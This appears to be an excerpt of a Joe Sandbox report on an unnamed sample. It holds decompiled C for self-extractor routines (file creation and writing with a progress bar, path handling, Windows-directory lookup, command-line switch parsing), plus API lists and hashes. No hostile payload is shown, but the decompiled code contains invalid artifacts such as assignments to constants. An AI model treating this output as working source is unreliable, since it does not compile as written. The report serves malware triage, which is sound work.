                                                                                                                                                                                                     			}








                                                                                                                                                                                                     Address column of the E00394C37 listing above (instruction addresses 0x00394c40 to 0x00394c8d); the per-line code text was not captured in this extraction.

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00394C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00394C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00394C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 567e55d77377d7fdbe06a31576ca66773df2c34475c0f86706196eae9d4d689e
• Instruction ID: dbf9b771125f623cdb55828268508035a1e2ef7a1a335f50695e52881686c5f5
• Opcode Fuzzy Hash: 567e55d77377d7fdbe06a31576ca66773df2c34475c0f86706196eae9d4d689e
• Instruction Fuzzy Hash: E7F0B47261120CBF9F26EFB5CC49DBB77ECEB44340B44062BB815C1150EA31D915DBA0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E0039487A(CHAR* __ecx, signed int __edx) {
				// CreateFileA wrapper. __ecx = ANSI path, __edx = CRT-style open flags:
				// bits 0-1 = access mode (_O_RDONLY/_O_WRONLY/_O_RDWR), 0x100 = _O_CREAT,
				// 0x200 = _O_TRUNC, 0x400 = _O_EXCL. The decompiler shows each "sbb reg, reg"
				// mask as ~(x); read it as (x != 0 ? -1 : 0), which is what the idiom produces.
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				// access mode 0 (_O_RDONLY) -> GENERIC_READ (0x80000000); any write mode ->
				// 0xc0000000 + 0x80000000 wraps to GENERIC_WRITE (0x40000000)
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					// no _O_CREAT: OPEN_EXISTING (3), or TRUNCATE_EXISTING (5) when _O_TRUNC is set
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						// _O_CREAT without _O_EXCL: OPEN_ALWAYS (4), or CREATE_ALWAYS (2) when _O_TRUNC is set
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1; // _O_CREAT | _O_EXCL: CREATE_NEW
					}
				}
				// share mode 0, no security attributes, FILE_ATTRIBUTE_NORMAL (0x80), no template file
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					// success, or a plain open of an existing file: no second attempt
					return _t7;
				} else {
					// the open could have created the file but failed: run E0039490C on the path
					// (body not shown in this report) and retry exactly once with the same arguments
					E0039490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

Instruction addresses for the decompiled statements above: 0x00394880, 0x0039488c, 0x00394894, 0x003948a0, 0x003948c9, 0x003948ce, 0x003948a2, 0x003948a8, 0x003948b7, 0x003948bc, 0x003948aa, 0x003948ac, 0x003948ac, 0x003948a8, 0x003948de, 0x003948e7, 0x0039490b, 0x003948ee, 0x003948f0, 0x00000000, 0x00394902

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00394A23,?,00394F67,*MEMCAB,00008000,00000180), ref: 003948DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00394F67,*MEMCAB,00008000,00000180), ref: 00394902
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 61f8fab8908e6f643dc3b6e20b95978565c7c2da29f9ee3f89c4c88bc7547773
• Instruction ID: 1073c6855fc54641ed0c647384fe75f02a3ad8f897c88f74ef516fc25ae2c409
• Opcode Fuzzy Hash: 61f8fab8908e6f643dc3b6e20b95978565c7c2da29f9ee3f89c4c88bc7547773
• Instruction Fuzzy Hash: 550169A3E169702AF72640298C88FB7551CCBD6735F1B0335FDEAEB6D2D6654C0682E0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E00394AD0(signed int _a4, void* _a8, long _a12) {
				// WriteFile wrapper with progress reporting. _a4 = index into a table of
				// 0x18-byte entries at 0x398d74 whose first field is the file handle,
				// _a8 = buffer, _a12 = byte count. Returns the number of bytes written, or -1.
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x39858c; // 0x270
				_t9 = E00393680(_t20); // pumps the UI message loop first (MsgWaitForMultipleObjects / PeekMessageA, see APIs below)
				if( *0x3991d8 == 0) { // when this global is non-zero nothing is written and -1 is returned
					_push(_t24);
					_t12 = WriteFile( *(0x398d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed; _a12 receives bytes written
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x399400; // 0xf1e00
							_t15 = _t14 + _t25; // running total of bytes written so far
							 *0x399400 = _t15;
							if( *0x398184 != 0) {
								_t21 =  *0x398584; // 0x0
								if(_t21 != 0) {
									// progress bar update: dialog item 0x83a, PBM_SETPOS (WM_USER + 2 = 0x402),
									// position = total written * 100 / expected total at 0x3993f8
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3993f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff; // WriteFile failed: return -1
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

Instruction addresses for the decompiled statements above: 0x00394ad5, 0x00394adb, 0x00394ae7, 0x00394aee, 0x00394b05, 0x00394b0d, 0x00394b14, 0x00394b1a, 0x00394b1c, 0x00394b21, 0x00394b2a, 0x00394b2f, 0x00394b31, 0x00394b39, 0x00394b54, 0x00394b54, 0x00394b39, 0x00394b2f, 0x00394b0f, 0x00394b0f, 0x00394b0f, 0x00394b5e, 0x00394ae9, 0x00394aed, 0x00394aed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00393680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0039369F
                                                                                                                                                                                                      • Part of subcall function 00393680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936B2
                                                                                                                                                                                                      • Part of subcall function 00393680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936DA
                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00394B05
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Appends a trailing backslash to the path in __ecx (if it does not already end
// with one) and then passes the space-trimmed string _a4 on to E003916B3.
// __edx is the size of the buffer at __ecx; if length + 1 does not fit, the
// function returns 0x8007007a (HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER)).
E0039658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t1;
	intOrPtr _t2;
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx;
	_t10 = __edx;
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0x398b3f
	_t12 = _t1;
	do {                                  // scan to the terminating NUL (inline strlen)
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12;                   // string length
	_t2 = _t18 + 1; // 0x398b40
	if(_t2 < __edx) {                     // length + 1 must fit in the buffer
		_t19 = _t18 + __ecx;              // points at the terminating NUL
		if(_t19 > __ecx) {                // non-empty string
			_t8 = CharPrevA(__ecx, _t19); // executed; last character, DBCS-aware
			if( *_t8 != 0x5c) {           // 0x5c == '\\'
				 *_t19 = 0x5c;            // append a backslash
				_t19 =  &(_t19[1]);
			}
		}
		_t6 = _a4;
		 *_t19 = 0;                       // re-terminate the path
		while( *_t6 == 0x20) {            // skip leading spaces in _a4
			_t6 = _t6 + 1;
		}
		return E003916B3(_t16, _t10, _t6);
	}
	return 0x8007007a;                    // ERROR_INSUFFICIENT_BUFFER as HRESULT
}


APIs
• CharPrevA.USER32(00398B3E,00398B3F,00000001,00398B3E,-00000003,?,003960EC,00391140,?), ref: 003965BA
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 93%
// Retrieves the Windows directory into a MAX_PATH-sized stack buffer and hands
// it to E0039597D. On failure it shows an error message via E003944B9
// (LoadStringA/MessageBoxA in the subcall) and stores GetLastError() (E00396285)
// in the global at 0x399124. _v8 holds the /GS stack cookie seeded from 0x398004.
E0039621E() {
	signed int _v8;
	char _v268;
	signed int _t5;
	void* _t8;
	void* _t9;
	void* _t13;
	void* _t19;
	void* _t20;
	signed int _t21;

	_t5 =  *0x398004; // 0x74c05eb4, security cookie
	_v8 = _t5 ^ _t21;
	if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {        // 0x104 == MAX_PATH
		_t9 = E0039597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
	} else {
		E003944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);          // error message box
		 *0x399124 = E00396285();                          // GetLastError()
		_t9 = 0;
	}
	return E00396CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20); // epilogue; _v8 ^ _t21 recomputes the cookie for checking
}


APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0039623F
  • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
  • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
  • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 5f0ec019b70e1dc91b2d2b216ea8f9e99e3e1e1f1511cce95a2ceffd033f5ca4
• Instruction ID: f858646e62406ffee7d28c0e60c9121f0e6dd75ae3d37017bb4228e1f92b42f3
• Opcode Fuzzy Hash: 5f0ec019b70e1dc91b2d2b216ea8f9e99e3e1e1f1511cce95a2ceffd033f5ca4
• Instruction Fuzzy Hash: 5AF0BEB0604208ABEF52EB788D03FBE32BCDB84300F40046AB986DA181EE759D848690
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00394B60(signed int _a4) {
	signed int _t9;
	signed int _t15;

	_t15 = _a4 * 0x18;
	if( *((intOrPtr*)(_t15 + 0x398d64)) != 1) {
		_t9 = FindCloseChangeNotification( *(_t15 + 0x398d74)); // executed
		if(_t9 == 0) {
			return _t9 | 0xffffffff;
		}
		*((intOrPtr*)(_t15 + 0x398d60)) = 1;
		return 0;
	}
	*((intOrPtr*)(_t15 + 0x398d60)) = 1;
	*((intOrPtr*)(_t15 + 0x398d68)) = 0;
	*((intOrPtr*)(_t15 + 0x398d70)) = 0;
	*((intOrPtr*)(_t15 + 0x398d6c)) = 0;
	return 0;
}


APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00394FA1,00000000), ref: 00394B98
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: ab8ff7552592e40440fe17ab0845933f933e724428e367d3f240c68c37de5c82
• Instruction ID: 519a3f15b12e533783fe87ab565d32ad0eb479a7734f7c0de25780bb2d9747b5
• Opcode Fuzzy Hash: ab8ff7552592e40440fe17ab0845933f933e724428e367d3f240c68c37de5c82
• Instruction Fuzzy Hash: F4F01271500B089E5B73AF3DCC11A52BBE8AAD6360310092EA5AED2190DB31A84BCBD0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E003966AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed
	if(_t1 != 0xffffffff) {
		return !(_t1 >> 4) & 0x00000001;
	} else {
		return 0;
	}
}


APIs
• GetFileAttributesA.KERNELBASE(?,00394777,?,00394E38,?), ref: 003966B1
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5bc2ceed80b135627d2a9e487361faeb9716eec6ffc49e738803cdff4b97f590
• Instruction ID: 4396de8264f7613f38ad510c09ceef0bcef33e8be9506d132684624b9dc34ab6
• Opcode Fuzzy Hash: 5bc2ceed80b135627d2a9e487361faeb9716eec6ffc49e738803cdff4b97f590
• Instruction Fuzzy Hash: 8BB09276626841426E2206396C2A5562845A6C133ABE51B95F032C02E0CA3EC856D044
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00394CA0(long _a4) {
	void* _t2;

	_t2 = GlobalAlloc(0, _a4); // executed
	return _t2;
}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00394CAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 2eec1409b953ae60451214f243766169e61138718ecd7d6d0ae0ffff73930543
• Instruction ID: a4e7ace4f0d5b3cdca7cae13a419faa75435f3bfac76305c43d23b7edc4e8510
• Opcode Fuzzy Hash: 2eec1409b953ae60451214f243766169e61138718ecd7d6d0ae0ffff73930543
• Instruction Fuzzy Hash: D9B0123204420CB7CF011FC6EC09F853F1DE7C4761F140001F60C451508A73942086D6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00394CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




0x00394cc8
0x00394ccf

APIs
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 8a87d90f8e68596caa144668fb7e1102b2f443ab98e407a2bf013e3bc01f9c23
• Instruction ID: 52008d38d2d1a643fb3b8c0bf75aa31be11740acf76300cbba486b4c1d20c929
• Opcode Fuzzy Hash: 8a87d90f8e68596caa144668fb7e1102b2f443ab98e407a2bf013e3bc01f9c23
• Instruction Fuzzy Hash: 09B0123100010CB78F011B46EC088453F1DD6C0360B000011F50C411218B33981185C5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00395C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x398004; // 0x74c05eb4
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00396CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00396E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E0039597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E003944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0x399124 = E00396285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00396CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                    												E003944B9(0, 0x521, 0x391140, 0, 0x40, 0);
                                                                                                                                                                                                    												_t85 =  *0x398588; // 0x0
                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                    															if(E0039667F(_t215, _t205) == 0) {
                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                    																if(E0039667F(_t215, _t206) == 0) {
                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                    																	if(E00395C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                    																		E00391680(0x398c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                    																	if(E0039667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                    																if(E0039667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *0x398a24 = 1;
                                                                                                                                                                                                    												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00395C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x398b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x398a3a;
																}
																E00391680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0039658A(_t218, 0x104, 0x391140);
